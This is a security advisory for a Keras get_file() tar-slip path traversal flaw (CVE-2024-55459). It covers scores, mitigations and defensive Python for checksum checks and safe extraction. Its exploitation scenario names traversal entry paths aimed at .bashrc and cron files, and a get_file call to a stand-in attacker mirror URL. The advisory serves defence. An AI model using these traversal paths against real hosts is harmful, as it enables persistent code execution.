CVE-2024-55459: Keras: path traversal enables arbitrary file write

GHSA-cjgq-5qmw-rcj6 | MEDIUM | PoC AVAILABLE | CISA: TRACK*
Published January 8, 2025
CISO Take

Any ML pipeline using Keras's get_file() to download external archives is vulnerable to arbitrary file writes on the host system via a crafted tar file. No official patch exists — immediately audit all get_file() calls, restrict downloads to integrity-verified sources, and isolate training environments. Teams using Keras ≤3.7.0 in automated MLOps pipelines should treat this as an active supply chain risk to training infrastructure.

What is the risk?

Medium severity in isolation, but elevated in AI/ML contexts where automated pipelines routinely download datasets and model weights from external sources without manual review. Exploitation is low complexity once a malicious archive is staged (classic tar-slip), but requires user or pipeline execution pointing to attacker-controlled URLs. No active exploitation observed (EPSS 0.00149), not in CISA KEV. Risk concentrates in developer workstations and CI/CD training pipelines; production inference endpoints are typically not affected unless they dynamically download artifacts.

What systems are affected?

Package | Ecosystem | Vulnerable Range | Patched
Keras | pip | (not listed) | No patch
Keras | pip | <= 3.7.0 | No patch

Package profile: 64.1K · OpenSSF 7.1 · 1.6K dependents · pushed 5d ago · 48% patched · ~32d to patch

How severe is it?

CVSS 3.1: 6.5 / 10
EPSS: 0.2% chance of exploitation in 30 days (higher than 12% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM
Sophistication: Trivial
Exploitation Confidence: medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

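Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Unchanged
Confidentiality (C): None
Integrity (I): High
Availability (A): None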

What should I do?

  1. PATCH

    No official fix available; monitor https://github.com/keras-team/keras for a release. The advisory lists every version up to and including 3.7.0 as vulnerable, so pin to an earlier version only if regression testing confirms that version is unaffected; otherwise fork and add manual path sanitization.

  2. WORKAROUND

    Replace get_file() calls with custom download logic that resolves the destination of every archive entry before extraction and rejects any entry that uses an absolute path or whose '../' components resolve outside the target directory.

  3. HARDEN

    Execute training jobs in isolated containers without host volume mounts; apply least-privilege filesystem permissions.

  4. VERIFY

    Enforce SHA-256 checksum validation for all downloaded archives before extraction; reject archives without a verified hash.

  5. DETECT

    Monitor for unexpected file writes outside designated data/model directories during training runs (auditd or eBPF-based tools).

  6. AUDIT

    Search codebase for all keras.utils.get_file() invocations; flag any that accept user-supplied or externally-sourced URLs.
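The WORKAROUND and VERIFY steps above can be sketched with the Python standard library alone. This is a minimal illustration, not the Keras implementation or an official fix: the helper names (sha256_of, unsafe_members, verified_safe_extract) are hypothetical, POSIX-style paths are assumed, and the archive is assumed to have been downloaded already without extraction.

```python
import hashlib
import os
import tarfile


def sha256_of(path, chunk_size=1 << 20):
    """Return the hex SHA-256 digest of a file, reading it in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def unsafe_members(tar, dest_dir):
    """Yield names of entries that resolve outside dest_dir or are not plain files/dirs."""
    root = os.path.realpath(dest_dir)
    for member in tar.getmembers():
        # An absolute member name replaces root in the join, so it is caught here too.
        target = os.path.realpath(os.path.join(root, member.name))
        escapes = os.path.commonpath([root, target]) != root
        # Links and device nodes are rejected outright in this sketch.
        if escapes or not (member.isfile() or member.isdir()):
            yield member.name


def verified_safe_extract(archive_path, dest_dir, expected_sha256):
    """Extract only if the checksum matches and every entry stays inside dest_dir."""
    if sha256_of(archive_path) != expected_sha256.lower():
        raise ValueError("checksum mismatch; refusing to extract")
    with tarfile.open(archive_path) as tar:
        bad = list(unsafe_members(tar, dest_dir))
        if bad:
            raise ValueError(f"unsafe archive entries: {bad}")
        # Use the stdlib 'data' extraction filter where this Python version has it.
        kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        tar.extractall(dest_dir, **kwargs)
```

The whole archive is rejected on the first unsafe entry rather than extracted partially, on the assumption that a dataset archive containing traversal paths or links should not be trusted at all.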

What does CISA's SSVC say?

Decision: Track*
Exploitation: poc
Automatable: No
Technical Impact: partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act: Article 15 - Accuracy, robustness and cybersecurity
ISO 42001: A.9.3 - AI supply chain
NIST AI RMF: MANAGE 2.2 - Mechanisms to investigate and address AI risks are in place
OWASP LLM Top 10: LLM03:2025 - Supply Chain

Frequently Asked Questions

What is CVE-2024-55459?

CVE-2024-55459 is a path traversal vulnerability (CWE-22) in the Keras get_file() function, affecting Keras ≤3.7.0. When get_file() downloads and extracts a crafted tar file, an attacker can write arbitrary files to the host system. No official patch exists; audit all get_file() calls, restrict downloads to integrity-verified sources, and isolate training environments.

Is CVE-2024-55459 actively exploited?

No active exploitation has been observed, and CVE-2024-55459 is not listed in CISA KEV. However, proof-of-concept exploit code is publicly available, which increases the risk of exploitation.

How to fix CVE-2024-55459?

1. PATCH: No official fix available; monitor https://github.com/keras-team/keras for a release. The advisory lists every version up to and including 3.7.0 as vulnerable, so pin to an earlier version only if regression testing confirms that version is unaffected; otherwise fork and add manual path sanitization.
2. WORKAROUND: Replace get_file() calls with custom download logic that validates extracted paths and rejects any entry containing '../' or absolute paths before extraction.
3. HARDEN: Execute training jobs in isolated containers without host volume mounts; apply least-privilege filesystem permissions.
4. VERIFY: Enforce SHA-256 checksum validation for all downloaded archives before extraction; reject archives without a verified hash.
5. DETECT: Monitor for unexpected file writes outside designated data/model directories during training runs (auditd or eBPF-based tools).
6. AUDIT: Search codebase for all keras.utils.get_file() invocations; flag any that accept user-supplied or externally-sourced URLs.

What systems are affected by CVE-2024-55459?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, data preprocessing pipelines, MLOps CI/CD pipelines, developer workstations.

What is the CVSS score for CVE-2024-55459?

CVE-2024-55459 has a CVSS v3.1 base score of 6.5 (MEDIUM). The EPSS exploitation probability is 0.22%.

What is the AI security impact?

Affected AI Architectures

training pipelines
data preprocessing pipelines
MLOps CI/CD pipelines
developer workstations

MITRE ATLAS Techniques

AML.T0002.000 Datasets
AML.T0010.001 AI Software
AML.T0011 User Execution
AML.T0018.002 Embed Malware

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.9.3
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM03:2025

What are the technical details?

Original Advisory

An issue in keras 3.7.0 allows attackers to write arbitrary files to the user's machine via downloading a crafted tar file through the get_file function.

Exploitation Scenario

An adversary crafts a malicious tar.gz archive whose entry names embed path traversal sequences (e.g., ../../home/mluser/.bashrc or ../../../../etc/cron.d/gpu-job). The archive is hosted on an attacker-controlled server or injected into a compromised public dataset mirror. A data scientist or automated MLOps pipeline calls keras.utils.get_file(origin='https://attacker-controlled-mirror.com/imagenet-subset.tar.gz', extract=True). Keras downloads and extracts the archive without sanitizing entry paths, silently writing attacker-controlled content to arbitrary filesystem locations. Depending on permissions, this can overwrite Python startup scripts, authorized_keys, or cron entries, giving the attacker persistent code execution on the ML training host with no further user interaction.
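Why such entry names escape the extraction directory can be shown with plain path arithmetic. The sketch below is illustrative only: the extraction directory /home/mluser/.keras/datasets and the entry names are assumptions chosen for the example, and resolved_target and escapes are hypothetical helpers, not Keras functions.

```python
import posixpath


def resolved_target(extract_dir, entry_name):
    """Return where a naive extractor would write an archive entry."""
    return posixpath.normpath(posixpath.join(extract_dir, entry_name))


def escapes(extract_dir, entry_name):
    """Return True if the entry would be written outside extract_dir."""
    root = posixpath.normpath(extract_dir)
    target = resolved_target(root, entry_name)
    return posixpath.commonpath([root, target]) != root


if __name__ == "__main__":
    cache = "/home/mluser/.keras/datasets"  # assumed extraction directory
    print(resolved_target(cache, "../../.bashrc"))                   # /home/mluser/.bashrc
    print(resolved_target(cache, "../../../../etc/cron.d/gpu-job"))  # /etc/cron.d/gpu-job
    print(escapes(cache, "images/cat.png"))                          # False
```

Each '../' component cancels one directory level of the extraction path, so an entry with enough of them, or with an absolute name, lands wherever the attacker chooses.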

Weaknesses (CWE)

CWE-22 — Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

  • [Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylis
  • [Architecture and Design] For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
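As a cross-check, the vector can be decoded and scored with the CVSS v3.1 base-score equations. This is a simplified sketch that handles only scope-unchanged vectors such as this one; base_score and roundup are hypothetical helper names, and the metric weights are taken from the CVSS v3.1 specification.

```python
import math

# Metric weights from the CVSS v3.1 specification (PR values are for unchanged scope).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value):
    """Round up to one decimal place, following the v3.1 Roundup definition."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector):
    """Compute the base score of a CVSS 3.1 vector with Scope: Unchanged."""
    parts = dict(item.split(":") for item in vector.split("/"))
    if parts.get("CVSS") != "3.1" or parts.get("S") != "U":
        raise ValueError("this sketch handles CVSS 3.1 with unchanged scope only")
    w = {metric: WEIGHTS[metric][parts[metric]] for metric in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


if __name__ == "__main__":
    print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"))  # 6.5
```

For this vector the impact term is 6.42 × 0.56 ≈ 3.60 and the exploitability term is about 2.84; their sum, about 6.43, rounds up to the published 6.5.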

Timeline

Published: January 8, 2025
Last Modified: September 22, 2025
First Seen: January 8, 2025

Related Vulnerabilities